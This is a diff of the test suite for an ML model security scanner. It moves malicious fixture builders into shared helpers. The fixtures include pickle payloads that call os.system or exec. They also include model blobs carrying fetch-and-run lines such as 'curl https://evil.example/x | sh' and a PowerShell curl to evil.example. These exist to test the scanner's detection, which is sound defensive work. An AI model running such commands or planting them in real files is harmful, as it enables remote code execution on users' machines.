+ + result = scan_file(str(polyglot), config={"cache_enabled": False}) + + assert result.scanner_name == "safetensors" + assert result.success is True + assert not result.issues + + +def _assert_generic_zip_pickle_routing( + tmp_path: Path, case_filename: str, case_member_name: str, case_version: bytes +) -> None: + disguised_zip = tmp_path / case_filename + _create_misnamed_zip( + disguised_zip, + { + case_member_name: pickle.dumps({"weights": [1, 2, 3]}), + "version": case_version, + }, + ) + + result = scan_file(str(disguised_zip)) + + assert result.scanner_name == "zip" + + +def _assert_misnamed_llamafile_detection(tmp_path: Path, case_filename: str) -> None: + disguised_llamafile = tmp_path / case_filename + disguised_llamafile.write_bytes( + b"\x7fELF" + + b"\x02\x01\x01\x00" + + b"\x00" * 56 + + b"llamafile runtime\nbash -c curl http://evil.example/payload.sh" + ) + + result = scan_file(str(disguised_llamafile)) + + assert result.scanner_name == "llamafile" + assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues) + + +def _assert_generic_json_existing_owner(tmp_path: Path, case_prefix: str) -> None: + config_path = tmp_path / "config.json" + config_path.write_text( + case_prefix + ",".join("0" for _ in range(5000)) + "]}", + encoding="utf-8", + ) + + result = scan_file(str(config_path)) + + assert result.scanner_name == "manifest" + assert "mxnet_symbol_routing_incomplete" not in result.metadata.get("scan_outcome_reasons", []) + + +def _assert_misnamed_tf_savedmodel_detection(tmp_path: Path, case_filename: str) -> None: + disguised_savedmodel = tmp_path / case_filename + disguised_savedmodel.write_bytes(_build_malicious_tf_savedmodel()) + + result = scan_file(str(disguised_savedmodel), config={"cache_scan_results": False}) + + assert result.scanner_name == "tf_savedmodel" + assert result.success is False + assert any( + issue.severity == IssueSeverity.CRITICAL and "PyFunc operation detected" in issue.message + for issue in result.issues + ) + + +def _assert_xgboost_json_pattern(model_path: Path) -> None: + result = scan_file(str(model_path), config={"cache_enabled": False}) + assert result.scanner_name == "xgboost" + assert "mxnet_symbol_routing_incomplete" not in result.metadata.get("scan_outcome_reasons", []) + assert any("Suspicious pattern detected: System call in JSON" in issue.message for issue in result.issues) + + +def _assert_xgboost_params_signature(model_path: Path) -> None: + result = scan_file(str(model_path), config={"cache_enabled": False}) + assert result.scanner_name == "xgboost" + assert "xgboost_mxnet_symbol_overlap" in result.metadata["scan_outcome_reasons"] + assert any("Potential executable signature found in params blob" in issue.message for issue in result.issues) + + +def _hide_descriptor_paths(monkeypatch: pytest.MonkeyPatch) -> None: + original_stat = Path.stat + + def hide_descriptor_aliases(candidate: Path, *args: Any, **kwargs: Any) -> os.stat_result: + if str(candidate).startswith(("/proc/self/fd/", "/dev/fd/")): + raise FileNotFoundError(str(candidate)) + return original_stat(candidate, *args, **kwargs) + + monkeypatch.setattr(Path, "stat", hide_descriptor_aliases) + + +def _reject_owner_before_containment(monkeypatch: pytest.MonkeyPatch, scanner_class: type[BaseScanner]) -> list[str]: + owner_calls: list[str] = [] + + def record_owner_scan(_scanner: BaseScanner, owner_path: str) -> ScanResult: + owner_calls.append(owner_path) + raise AssertionError("owner scan must not run before path containment") + + monkeypatch.setattr(scanner_class, "scan", record_owner_scan) + return owner_calls + + +def _record_shard_calls( + monkeypatch: pytest.MonkeyPatch, + blob_paths: list[Path], + captured_configs: list[dict[str, Any]] | None = None, +) -> list[str]: + calls: list[str] = [] + + def fake_scan_file(path: str, config: dict[str, Any] | None = None) -> ScanResult: + calls.append(path) + if captured_configs is not None: + captured_configs.append(dict(config or {})) + return _mock_sharded_scan_result(sum(blob_path.stat().st_size for blob_path in blob_paths)) + + monkeypatch.setattr(core_module, "scan_file", fake_scan_file) + return calls diff --git a/tests/test_core_asset_extraction.py b/tests/test_core_asset_extraction.py index 3c5da2c52..f8c96593d 100644 --- a/tests/test_core_asset_extraction.py +++ b/tests/test_core_asset_extraction.py @@ -4,9 +4,7 @@ import pickle import sys import zipfile -from collections.abc import Callable from pathlib import Path -from typing import Any from unittest.mock import patch import numpy as np @@ -20,6 +18,7 @@ from modelaudit.core_results import _extract_primary_asset_from_location from modelaudit.scanners import _registry from modelaudit.utils.file import detection +from tests.helpers.file_creators import ExecPayload def test_extract_primary_asset_windows_path_with_archive() -> None: @@ -107,12 +106,8 @@ def test_duplicate_metadata_handles_newline_paths(tmp_path: Path) -> None: def test_npz_member_checks_keep_archive_member_locations(tmp_path: Path) -> None: - class _ExecPayload: - def __reduce__(self) -> tuple[Callable[..., Any], tuple[Any, ...]]: - return (exec, ("print('owned')",)) - archive_path = tmp_path / "payload.npz" - np.savez(archive_path, safe=np.arange(3), payload=np.array([_ExecPayload()], dtype=object)) + np.savez(archive_path, safe=np.arange(3), payload=np.array([ExecPayload()], dtype=object)) result = scan_model_directory_or_file(str(archive_path)) payload_checks = [ @@ -132,10 +127,6 @@ def __reduce__(self) -> tuple[Callable[..., Any], tuple[Any, ...]]: def test_check_consolidation_keeps_distinct_npz_member_findings(tmp_path: Path) -> None: - class ExecPayload: - def __reduce__(self) -> tuple[Callable[..., Any], tuple[Any, ...]]: - return (exec, ("print('owned')",)) - archive_path = tmp_path / "payload.npz" np.savez(archive_path, safe=np.arange(3), payload=np.array([ExecPayload()], dtype=object)) @@ -150,10 +141,6 @@ def __reduce__(self) -> tuple[Callable[..., Any], tuple[Any, ...]]: def test_check_consolidation_keeps_nested_npz_member_findings_distinct(tmp_path: Path) -> None: - class ExecPayload: - def __reduce__(self) -> tuple[Callable[..., Any], tuple[Any, ...]]: - return (exec, ("print('owned')",)) - inner_npz = tmp_path / "inner.npz" np.savez( inner_npz, diff --git a/tests/test_cve_2025_10155_bin_pickle.py b/tests/test_cve_2025_10155_bin_pickle.py index fbfdb645c..ff1998899 100644 --- a/tests/test_cve_2025_10155_bin_pickle.py +++ b/tests/test_cve_2025_10155_bin_pickle.py @@ -121,12 +121,7 @@ def test_posix_system_in_bin_detected(self, tmp_path: Path) -> None: # Protocol 0 pickle: GLOBAL posix.system, then REDUCE bin_path.write_bytes(b"cposix\nsystem\n(S'echo pwned'\ntR.") - scanner = PickleScanner() - result = scanner.scan(str(bin_path)) - - assert self._has_critical_symbol_issue(result, "posix.system"), ( - f"Expected CRITICAL issue for posix.system. Issues: {[i.message for i in result.issues]}" - ) + _assert_bin_symbol(self, bin_path, "posix.system", "Expected CRITICAL issue for posix.system. Issues: ") def test_nt_system_in_bin_detected(self, tmp_path: Path) -> None: """nt.system payload in a .bin file should be caught.""" @@ -134,12 +129,7 @@ def test_nt_system_in_bin_detected(self, tmp_path: Path) -> None: # Protocol 0 pickle: GLOBAL nt.system, then REDUCE bin_path.write_bytes(b"cnt\nsystem\n(S'cmd /c whoami'\ntR.") - scanner = PickleScanner() - result = scanner.scan(str(bin_path)) - - assert self._has_critical_symbol_issue(result, "nt.system"), ( - f"Expected CRITICAL issue for nt.system. Issues: {[i.message for i in result.issues]}" - ) + _assert_bin_symbol(self, bin_path, "nt.system", "Expected CRITICAL issue for nt.system. Issues: ") def test_protocol2_posix_in_bin_detected(self, tmp_path: Path) -> None: """Protocol 2 pickle with posix.system in .bin should also be caught.""" @@ -147,12 +137,8 @@ def test_protocol2_posix_in_bin_detected(self, tmp_path: Path) -> None: # Protocol 2 header + GLOBAL opcode for posix.system bin_path.write_bytes(b"\x80\x02cposix\nsystem\n(S'id'\ntR.") - scanner = PickleScanner() - result = scanner.scan(str(bin_path)) - - assert self._has_critical_symbol_issue(result, "posix.system"), ( - f"Expected CRITICAL issue for posix.system in protocol 2 payload. " - f"Issues: {[i.message for i in result.issues]}" + _assert_bin_symbol( + self, bin_path, "posix.system", "Expected CRITICAL issue for posix.system in protocol 2 payload. Issues: " ) def test_protocol1_posix_in_bin_detected(self, tmp_path: Path) -> None: @@ -199,3 +185,9 @@ def test_nt_system_in_patterns(self) -> None: def test_nt_popen_in_patterns(self) -> None: """nt\\npopen should be in BINARY_CODE_PATTERNS.""" assert b"nt\npopen" in BINARY_CODE_PATTERNS + + +def _assert_bin_symbol(owner: TestCVE202510155PickleScanning, bin_path: Path, symbol: str, failure_prefix: str) -> None: + scanner = PickleScanner() + result = scanner.scan(str(bin_path)) + assert owner._has_critical_symbol_issue(result, symbol), f"{failure_prefix}{[i.message for i in result.issues]}" diff --git a/tests/test_dill_joblib_enhanced.py b/tests/test_dill_joblib_enhanced.py index 20e88d487..e1ec01948 100644 --- a/tests/test_dill_joblib_enhanced.py +++ b/tests/test_dill_joblib_enhanced.py @@ -5,7 +5,6 @@ import os import pickle from pathlib import Path -from typing import Any import pytest @@ -13,11 +12,37 @@ from modelaudit.scanners import pickle_scanner as pickle_scanner_module from modelaudit.scanners.base import IssueSeverity from modelaudit.scanners.pickle_scanner import ML_SAFE_GLOBALS, PickleScanner, _is_legitimate_serialization_file +from tests.helpers.file_creators import SystemCommandPayload +from tests.helpers.file_creators import ( + joblib_numpy_raw_segment as _joblib_numpy_raw_segment, +) +from tests.helpers.file_creators import ( + pickle_binunicode_text as _binunicode, +) -class MaliciousPayload: - def __reduce__(self) -> tuple[Any, tuple[str]]: - return (os.system, ("id",)) +def requires_origin_review(module: str, name: str) -> bool: + return not trusted_joblib_reference(module, name) + + +def trusted_joblib_invocation(module: str, name: str, reference: dict[str, object]) -> bool: + del reference + return trusted_joblib_reference(module, name) + + +def trusted_joblib_reference( + module: str, + name: str, + *, + pickle_entrypoint_methods: tuple[str, ...] | None = None, + pickle_invokes_metaclass_call: bool | None = None, +) -> bool: + del pickle_entrypoint_methods, pickle_invokes_metaclass_call + return (module, name) in { + ("joblib.numpy_pickle", "NumpyArrayWrapper"), + ("numpy", "ndarray"), + ("numpy", "dtype"), + } def _write_joblib_like_pickle(path: Path, *, padding: int = 0) -> None: @@ -26,11 +51,6 @@ def _write_joblib_like_pickle(path: Path, *, padding: int = 0) -> None: ) -def _binunicode(value: str) -> bytes: - encoded = value.encode("utf-8") - return b"X" + len(encoded).to_bytes(4, "little") + encoded - - def _joblib_numpy_wrapper_control(*, shape: int = 4, dtype: str = "i8") -> bytes: return ( b"cjoblib.numpy_pickle\nNumpyArrayWrapper\n)\x81}(" @@ -53,11 +73,6 @@ def _joblib_numpy_wrapper_control(*, shape: int = 4, dtype: str = "i8") -> bytes ) -def _joblib_numpy_raw_segment(prefix_length: int, raw_data: bytes) -> bytes: - padding_length = 16 - ((prefix_length + 1) % 16) - return bytes([padding_length]) + (b"\xff" * padding_length) + raw_data - - def _write_joblib_numpy_array_pickle(path: Path) -> None: prefix = b"\x80\x02](" + _joblib_numpy_wrapper_control() path.write_bytes(prefix + _joblib_numpy_raw_segment(len(prefix), b"\x00" * 32) + b"e.") @@ -65,7 +80,7 @@ def _write_joblib_numpy_array_pickle(path: Path) -> None: def test_malicious_joblib_extension_cannot_bypass_rust_scan(tmp_path: Path) -> None: malicious_file = tmp_path / "evil.joblib" - malicious_file.write_bytes(pickle.dumps(MaliciousPayload(), protocol=4)) + malicious_file.write_bytes(pickle.dumps(SystemCommandPayload("id", lambda: os.system), protocol=4)) result = PickleScanner().scan(str(malicious_file)) @@ -76,7 +91,7 @@ def test_malicious_joblib_extension_cannot_bypass_rust_scan(tmp_path: Path) -> N def test_malicious_dill_extension_cannot_bypass_rust_scan(tmp_path: Path) -> None: malicious_file = tmp_path / "evil.dill" - malicious_file.write_bytes(pickle.dumps(MaliciousPayload(), protocol=4)) + malicious_file.write_bytes(pickle.dumps(SystemCommandPayload("id", lambda: os.system), protocol=4)) result = PickleScanner().scan(str(malicious_file)) @@ -96,27 +111,6 @@ def test_valid_joblib_like_pickle_has_serialization_span_proof( joblib_file = tmp_path / "numpy_arrays.joblib" _write_joblib_numpy_array_pickle(joblib_file) - def trusted_joblib_reference( - module: str, - name: str, - *, - pickle_entrypoint_methods: tuple[str, ...] | None = None, - pickle_invokes_metaclass_call: bool | None = None, - ) -> bool: - del pickle_entrypoint_methods, pickle_invokes_metaclass_call - return (module, name) in { - ("joblib.numpy_pickle", "NumpyArrayWrapper"), - ("numpy", "ndarray"), - ("numpy", "dtype"), - } - - def trusted_joblib_invocation(module: str, name: str, reference: dict[str, object]) -> bool: - del reference - return trusted_joblib_reference(module, name) - - def requires_origin_review(module: str, name: str) -> bool: - return not trusted_joblib_reference(module, name) - monkeypatch.setattr( "modelaudit.scanners.pickle_scanner.import_only_reference_is_proven_trusted", trusted_joblib_reference, @@ -187,38 +181,17 @@ def test_valid_joblib_raw_array_tail_is_trusted( joblib_file = tmp_path / "numpy_arrays.joblib" _write_joblib_numpy_array_pickle(joblib_file) - def trusted_joblib_references( - module: str, - name: str, - *, - pickle_entrypoint_methods: tuple[str, ...] | None = None, - pickle_invokes_metaclass_call: bool | None = None, - ) -> bool: - del pickle_entrypoint_methods, pickle_invokes_metaclass_call - return (module, name) in { - ("joblib.numpy_pickle", "NumpyArrayWrapper"), - ("numpy", "ndarray"), - ("numpy", "dtype"), - } - - def trusted_joblib_invocation(module: str, name: str, reference: dict[str, object]) -> bool: - del reference - return trusted_joblib_references(module, name) - - def requires_origin_review(module: str, name: str) -> bool: - return not trusted_joblib_references(module, name) - monkeypatch.setattr( "modelaudit.scanners.pickle_scanner.import_only_reference_is_proven_trusted", - trusted_joblib_references, + trusted_joblib_reference, ) monkeypatch.setattr( "modelaudit.scanners.joblib_scanner.import_only_reference_is_proven_trusted", - trusted_joblib_references, + trusted_joblib_reference, ) monkeypatch.setattr( "modelaudit_picklescan.api.import_only_reference_is_proven_trusted", - trusted_joblib_references, + trusted_joblib_reference, ) monkeypatch.setattr( "modelaudit_picklescan.api.import_only_reference_is_proven_trusted_for_pickle_invocation", @@ -226,7 +199,7 @@ def requires_origin_review(module: str, name: str) -> bool: ) monkeypatch.setattr( "modelaudit_picklescan.call_graph.import_only_reference_is_proven_trusted", - trusted_joblib_references, + trusted_joblib_reference, ) monkeypatch.setattr( "modelaudit_picklescan.call_graph.import_only_reference_is_proven_trusted_for_pickle_invocation", diff --git a/tests/test_directory_file_filtering.py b/tests/test_directory_file_filtering.py index 221563885..8008ff9f5 100644 --- a/tests/test_directory_file_filtering.py +++ b/tests/test_directory_file_filtering.py @@ -2,7 +2,6 @@ import bz2 import gzip -import importlib import io import json import lzma @@ -16,7 +15,6 @@ import zipfile from collections.abc import Callable from pathlib import Path -from typing import cast import pytest @@ -34,7 +32,6 @@ SAFETENSORS_ROUTING_HEADER_PARSE_BYTES, ) from modelaudit.utils.file.filtering import _ZIP_MEMBER_SNIFF_LIMIT, should_skip_file -from modelaudit.utils.tensorflow_compat import has_tensorflow_protobuf_stubs as _has_tf_protos from tests.helpers import ( create_malicious_pickle, create_mock_mxnet_symbol, @@ -42,57 +39,38 @@ prefix_mock_onnx_with_unknown_field, prefix_mock_onnx_with_unknown_group, ) - - -def _require_tf_protos() -> None: - if not _has_tf_protos(): - pytest.skip("TensorFlow protobuf stubs unavailable") +from tests.helpers.file_creators import SystemCommandPayload, write_sparse_safetensors_framing +from tests.helpers.file_creators import ( + build_line_broken_printable_utf8_ambiguous_binary_route as _build_line_broken_printable_utf8_ambiguous_binary_route, +) +from tests.helpers.file_creators import ( + build_printable_utf8_ambiguous_binary_route as _build_printable_utf8_ambiguous_binary_route, +) +from tests.helpers.file_creators import corrupt_zip_member_crc as _corrupt_zip_member_crc +from tests.helpers.file_creators import ( + printable_unknown_proto_prefix as _printable_unknown_proto_prefix, +) +from tests.helpers.file_creators import ( + write_hf_cachedir_tag as _write_hf_cachedir_tag, +) +from tests.helpers.file_creators import ( + write_hf_download_metadata as _write_hf_download_metadata, +) +from tests.helpers.file_creators import ( + write_malicious_cntk as _write_malicious_cntk, +) +from tests.helpers.file_creators import ( + write_malicious_lightgbm as _write_malicious_lightgbm, +) +from tests.helpers.tensorflow import _build_malicious_tf_savedmodel, build_malicious_tf_metagraph def _build_malicious_tf_metagraph() -> bytes: - _require_tf_protos() - import modelaudit.protos # noqa: F401 - - meta_graph_pb2 = importlib.import_module("tensorflow.core.protobuf.meta_graph_pb2") - metagraph = meta_graph_pb2.MetaGraphDef() - metagraph.meta_info_def.meta_graph_version = "modelaudit_directory_route_test" - node = metagraph.graph_def.node.add() - node.name = "pyfunc_node" - node.op = "PyFunc" - node.attr["func"].s = b"python -c 'import os; os.system(\"curl https://evil.example/x | sh\")'" - return cast(bytes, metagraph.SerializeToString()) - - -def _build_printable_utf8_ambiguous_binary_route() -> bytes: - """Build printable UTF-8 bytes that still require binary fail-closed routing.""" - return (b'""' + ("é" * 17).encode("utf-8")) * 4097 - - -def _build_line_broken_printable_utf8_ambiguous_binary_route() -> bytes: - """Build line-broken printable UTF-8 bytes requiring binary fail-closed routing.""" - return (b'""' + ("é" * 17).encode("utf-8") + b"\n") * 4097 - - -def _build_malicious_tf_savedmodel() -> bytes: - _require_tf_protos() - import modelaudit.protos # noqa: F401 - - saved_model_pb2 = importlib.import_module("tensorflow.core.protobuf.saved_model_pb2") - saved_model = saved_model_pb2.SavedModel() - saved_model.saved_model_schema_version = 1 - metagraph = saved_model.meta_graphs.add() - node = metagraph.graph_def.node.add() - node.name = "pyfunc_node" - node.op = "PyFunc" - return cast(bytes, saved_model.SerializeToString()) + return build_malicious_tf_metagraph("modelaudit_directory_route_test") def _write_sparse_oversized_safetensors_candidate(path: Path) -> None: - header_len = SAFETENSORS_ROUTING_HEADER_PARSE_BYTES + 1 - with path.open("wb") as handle: - handle.write(struct.pack(" None: @@ -100,11 +78,6 @@ def _write_minimal_safetensors(path: Path) -> None: path.write_bytes(struct.pack(" bytes: - field = b"z " + (b"x" * 32) - return field * ((min_bytes // len(field)) + 1) - - def _bert_vocab_text() -> str: tokens = ["[PAD]", "[UNK]", "[CLS]", "[SEP]", "[MASK]"] tokens.extend(f"[unused{index}]" for index in range(2048)) @@ -165,109 +138,23 @@ def _large_model_card_text(min_bytes: int = 3 * 1024 * 1024) -> str: return "\n".join(lines) + "\n" -def _corrupt_zip_member_crc(path: Path, member_name: str) -> None: - """Patch a ZIP member CRC so full scanning sees a malformed entry.""" - with zipfile.ZipFile(path) as archive: - info = archive.getinfo(member_name) - bad_crc = ((info.CRC + 1) & 0xFFFFFFFF).to_bytes(4, "little") - local_offset = info.header_offset - - data = bytearray(path.read_bytes()) - assert data[local_offset : local_offset + 4] == b"PK\x03\x04" - data[local_offset + 14 : local_offset + 18] = bad_crc - - member_name_bytes = member_name.encode("utf-8") - central_offset = 0 - while True: - central_offset = data.find(b"PK\x01\x02", central_offset) - assert central_offset >= 0 - name_length = int.from_bytes(data[central_offset + 28 : central_offset + 30], "little") - extra_length = int.from_bytes(data[central_offset + 30 : central_offset + 32], "little") - comment_length = int.from_bytes(data[central_offset + 32 : central_offset + 34], "little") - name_start = central_offset + 46 - name_end = name_start + name_length - if data[name_start:name_end] == member_name_bytes: - data[central_offset + 16 : central_offset + 20] = bad_crc - break - central_offset = name_end + extra_length + comment_length - - path.write_bytes(data) - - -def _write_hf_download_metadata(path: Path) -> None: - path.parent.mkdir(parents=True, exist_ok=True) - path.write_text( - "c5ee24cb16019beea0893ab7796b1df96625c6b8\n821d1aa69520101d6e0737f78a042ae25b19e5c0\n1712656091.123\n", - encoding="utf-8", - ) - - -def _write_hf_cachedir_tag(path: Path) -> None: - path.parent.mkdir(parents=True, exist_ok=True) - path.write_text( - "Signature: 8a477f597d28d172789f06886806bc55\n" - "# This file is a cache directory tag created by huggingface_hub.\n" - "# For information about cache directory tags, see:\n" - "#\thttps://bford.info/cachedir/\n", - encoding="utf-8", - ) - - -def _write_malicious_cntk(path: Path, include_structure: bool = True) -> None: - prefix = b"\x08\x01\x12\x11\x0a\x07version\x12\x06\x08\x01\x10\x03(\x02\x12\x09\x0a\x03uid\x12\x02ab" - structure = b" CompositeFunction primitive_functions " if include_structure else b"" - payload = b" native_user_function loadlibrary C:\\temp\\evil.dll powershell -c curl http://evil.example/p.sh " - path.write_bytes(prefix + structure + payload) - - -def _write_malicious_lightgbm(path: Path, valid: bool = True) -> None: - body = "tree=0\nversion=v4\nnum_class=1\n" - if valid: - body += ( - "num_tree_per_iteration=1\nmax_feature_idx=2\ntree_sizes=12\nnum_leaves=2\n" - "split_feature=0\nleaf_value=0.1 0.2\n" - "metadata=os.system('curl https://collector.evil.example/payload.sh | sh')\n" - "callback_url=https://collector.evil.example/payload.sh\n" - ) - path.write_text(body, encoding="utf-8") - - class TestDirectoryFileFiltering: """Test directory scanning with file filtering.""" def test_skip_file_types_enabled(self): """Test that non-model files are skipped when skip_file_types=True.""" - with tempfile.TemporaryDirectory() as tmp_dir: - # Create various file types - (Path(tmp_dir) / "README.md").write_text("Documentation") - (Path(tmp_dir) / "script.py").write_text("print('hello')") - (Path(tmp_dir) / "style.css").write_text("body { color: red; }") - (Path(tmp_dir) / "model.pkl").write_bytes(pickle.dumps({"weights": [1.0]})) - (Path(tmp_dir) / "config.json").write_text('{"key": "value"}') - - # Scan with file filtering enabled (default) - results = scan_model_directory_or_file(tmp_dir, skip_file_types=True) - - # Should scan model files and README for security - assert results["files_scanned"] == 3 # model.pkl, config.json, and README.md - assert results["success"] is True + # Create various file types + # Scan with file filtering enabled (default) + # Should scan model files and README for security + # model.pkl, config.json, and README.md + _assert_directory_file_type_filter((True), (3)) def test_skip_file_types_disabled(self): """Test that all files are scanned when skip_file_types=False.""" - with tempfile.TemporaryDirectory() as tmp_dir: - # Create various file types - (Path(tmp_dir) / "README.md").write_text("Documentation") - (Path(tmp_dir) / "script.py").write_text("print('hello')") - (Path(tmp_dir) / "style.css").write_text("body { color: red; }") - (Path(tmp_dir) / "model.pkl").write_bytes(pickle.dumps({"weights": [1.0]})) - (Path(tmp_dir) / "config.json").write_text('{"key": "value"}') - - # Scan with file filtering disabled - results = scan_model_directory_or_file(tmp_dir, skip_file_types=False) - - # Should scan all files - assert results["files_scanned"] == 5 - assert results["success"] is True + # Create various file types + # Scan with file filtering disabled + # Should scan all files + _assert_directory_file_type_filter((False), (5)) def test_hidden_files_skipped(self): """Test that hidden files are skipped appropriately.""" @@ -392,13 +279,7 @@ def test_disguised_pickle_with_skipped_extension_is_scanned(self, tmp_path: Path """Directory scans should not skip payloads whose content is a supported format.""" disguised_payload = tmp_path / "payload.jpg" - class DangerousPayload: - def __reduce__(self) -> tuple[object, tuple[str]]: - import os as os_module - - return (os_module.system, ("echo directory-prefilter-test",)) - - disguised_payload.write_bytes(pickle.dumps(DangerousPayload())) + disguised_payload.write_bytes(pickle.dumps(SystemCommandPayload("echo directory-prefilter-test"))) results = scan_model_directory_or_file(str(tmp_path)) @@ -1188,16 +1069,10 @@ def test_disguised_pickle_with_default_hidden_or_basename_skip_is_scanned( ) -> None: """Default hidden/basename filters must not suppress supported payload content.""" - class DangerousPayload: - def __reduce__(self) -> tuple[object, tuple[str]]: - import os as os_module - - return (os_module.system, ("echo directory-hidden-filter-test",)) - safe_payload = tmp_path / "safe.pkl" disguised_payload = tmp_path / filename safe_payload.write_bytes(pickle.dumps({"safe": True})) - disguised_payload.write_bytes(pickle.dumps(DangerousPayload())) + disguised_payload.write_bytes(pickle.dumps(SystemCommandPayload("echo directory-hidden-filter-test"))) results = scan_model_directory_or_file(str(tmp_path)) @@ -1298,15 +1173,9 @@ def raise_os_error(_path: Path, _marker: bytes, _limit: int) -> bool: def test_disguised_llamafile_zip_polyglot_preserves_nested_findings(self, tmp_path: Path) -> None: """A renamed executable ZIP wrapper must retain recursive member scanning.""" - class DangerousPayload: - def __reduce__(self) -> tuple[object, tuple[str]]: - import os as os_module - - return (os_module.system, ("echo directory-llamafile-zip-test",)) - payload = tmp_path / "payload.jpg" with zipfile.ZipFile(payload, "w") as archive: - archive.writestr("payload.pkl", pickle.dumps(DangerousPayload())) + archive.writestr("payload.pkl", pickle.dumps(SystemCommandPayload("echo directory-llamafile-zip-test"))) payload.write_bytes(b"\x7fELF" + b"\x00" * 60 + b"llamafile runtime\n" + payload.read_bytes()) results = scan_model_directory_or_file(str(tmp_path)) @@ -1335,15 +1204,9 @@ def test_disguised_llamafile_skops_polyglot_preserves_cve_findings(self, tmp_pat def test_executable_zip_with_out_of_window_llamafile_marker_preserves_nested_findings(self, tmp_path: Path) -> None: """ZIP structure must preserve coverage independently of bounded marker routing.""" - class DangerousPayload: - def __reduce__(self) -> tuple[object, tuple[str]]: - import os as os_module - - return (os_module.system, ("echo directory-late-marker-zip-test",)) - payload = tmp_path / "payload.jpg" with zipfile.ZipFile(payload, "w") as archive: - archive.writestr("payload.pkl", pickle.dumps(DangerousPayload())) + archive.writestr("payload.pkl", pickle.dumps(SystemCommandPayload("echo directory-late-marker-zip-test"))) payload.write_bytes( b"\x7fELF" + b"\x00" * 60 @@ -1533,16 +1396,13 @@ def test_docx_with_embedded_pickle_bin_is_scanned(self, tmp_path: Path) -> None: """Model-like .bin payloads in Office ZIP containers should not be hidden by the outer suffix.""" docx_path = tmp_path / "report.docx" - class DangerousPayload: - def __reduce__(self) -> tuple[object, tuple[str]]: - import os as os_module - - return (os_module.system, ("echo embedded-bin-prefilter-test",)) - with zipfile.ZipFile(docx_path, "w") as archive: archive.writestr("[Content_Types].xml", "") archive.writestr("word/document.xml", "") - archive.writestr("word/embeddings/oleObject1.bin", pickle.dumps(DangerousPayload(), protocol=4)) + archive.writestr( + "word/embeddings/oleObject1.bin", + pickle.dumps(SystemCommandPayload("echo embedded-bin-prefilter-test"), protocol=4), + ) results = scan_model_directory_or_file(str(tmp_path)) @@ -1554,18 +1414,14 @@ def test_large_docx_with_late_pickle_payload_is_scanned(self, tmp_path: Path) -> """Late model payloads in Office-like ZIPs must survive bounded prefiltering.""" docx_path = tmp_path / "late-payload.docx" - class DangerousPayload: - def __reduce__(self) -> tuple[object, tuple[str]]: - import os as os_module - - return (os_module.system, ("echo late-office-prefilter-test",)) - with zipfile.ZipFile(docx_path, "w") as archive: archive.writestr("[Content_Types].xml", "") archive.writestr("word/document.xml", "") for index in range(_ZIP_MEMBER_SNIFF_LIMIT): archive.writestr(f"docs/{index}.txt", "filler") - archive.writestr("payload.pkl", pickle.dumps(DangerousPayload(), protocol=4)) + archive.writestr( + "payload.pkl", pickle.dumps(SystemCommandPayload("echo late-office-prefilter-test"), protocol=4) + ) results = scan_model_directory_or_file(str(tmp_path)) @@ -2194,18 +2050,12 @@ def test_appended_hf_cachedir_tag_is_scanned(self, tmp_path: Path) -> None: def test_local_download_bookkeeping_rejects_spoofed_payloads(self, tmp_path: Path, filename: str) -> None: """Local cache-looking paths must not skip pickle payloads.""" - class DangerousPayload: - def __reduce__(self) -> tuple[object, tuple[str]]: - import os as os_module - - return (os_module.system, ("echo spoofed-local-bookkeeping-test",)) - model_dir = tmp_path / "downloaded-model" model_dir.mkdir() (model_dir / "config.json").write_text('{"model_type":"gpt2"}') payload = model_dir / ".cache" / "huggingface" / "download" / filename payload.parent.mkdir(parents=True) - payload.write_bytes(pickle.dumps(DangerousPayload(), protocol=0)) + payload.write_bytes(pickle.dumps(SystemCommandPayload("echo spoofed-local-bookkeeping-test"), protocol=0)) assert _is_huggingface_cache_file(str(payload)) is False @@ -2213,14 +2063,8 @@ def __reduce__(self) -> tuple[object, tuple[str]]: def test_direct_scans_do_not_skip_local_bookkeeping_filenames(self, tmp_path: Path, filename: str) -> None: """A malicious local file should not become trusted because of its basename.""" - class DangerousPayload: - def __reduce__(self) -> tuple[object, tuple[str]]: - import os as os_module - - return (os_module.system, ("echo direct-scan-bookkeeping-test",)) - payload = tmp_path / filename - payload.write_bytes(pickle.dumps(DangerousPayload())) + payload.write_bytes(pickle.dumps(SystemCommandPayload("echo direct-scan-bookkeeping-test"))) result = scan_file(str(payload)) @@ -2328,3 +2172,17 @@ def test_performance_with_many_files(self): # Duration should be reasonable (not checking exact time to avoid flakiness) assert "duration" in results + + +def _assert_directory_file_type_filter(case_skip_file_types: bool, case_file_count: int) -> None: + with tempfile.TemporaryDirectory() as tmp_dir: + (Path(tmp_dir) / "README.md").write_text("Documentation") + (Path(tmp_dir) / "script.py").write_text("print('hello')") + (Path(tmp_dir) / "style.css").write_text("body { color: red; }") + (Path(tmp_dir) / "model.pkl").write_bytes(pickle.dumps({"weights": [1.0]})) + (Path(tmp_dir) / "config.json").write_text('{"key": "value"}') + + results = scan_model_directory_or_file(tmp_dir, skip_file_types=case_skip_file_types) + + assert results["files_scanned"] == case_file_count + assert results["success"] is True diff --git a/tests/test_false_positive_fixes.py b/tests/test_false_positive_fixes.py index 9c4f96946..e7909e777 100644 --- a/tests/test_false_positive_fixes.py +++ b/tests/test_false_positive_fixes.py @@ -20,6 +20,7 @@ from modelaudit.cli import main as cli_main from modelaudit.scanners.base import IssueSeverity from modelaudit.scanners.weight_distribution_scanner import WeightDistributionScanner +from tests.helpers.file_creators import SystemCommandPayload GPT2_TEST_VOCAB_SIZE = 12_000 GPT2_TEST_EMBED_DIM = 64 @@ -343,14 +344,8 @@ def test_malicious_files_still_detected(self, tmp_path): # Create a simple malicious pickle that tries to execute system commands import pickle - class MaliciousClass: - def __reduce__(self): - import os - - return (os.system, ("echo 'malicious code executed'",)) - with open(evil_pickle_path, "wb") as f: - pickle.dump(MaliciousClass(), f) + pickle.dump(SystemCommandPayload("echo 'malicious code executed'"), f) result = self._run_cli_scan(str(evil_pickle_path)) assert result["exit_code"] == 1, "Malicious pickle should be detected" diff --git a/tests/test_huggingface_extensions.py b/tests/test_huggingface_extensions.py index a02cb474d..5d38a06fe 100644 --- a/tests/test_huggingface_extensions.py +++ b/tests/test_huggingface_extensions.py @@ -1,9 +1,7 @@ """Tests for centralized MODEL_EXTENSIONS in HuggingFace downloads.""" -import subprocess -import sys - from modelaudit.utils.sources.huggingface import _get_model_extensions +from tests.helpers.processes import assert_scanners_absent_in_subprocess as _assert_scanners_absent_in_subprocess # Get extensions once for all tests MODEL_EXTENSIONS = _get_model_extensions() @@ -109,24 +107,13 @@ def test_model_extensions_all_lowercase(): def 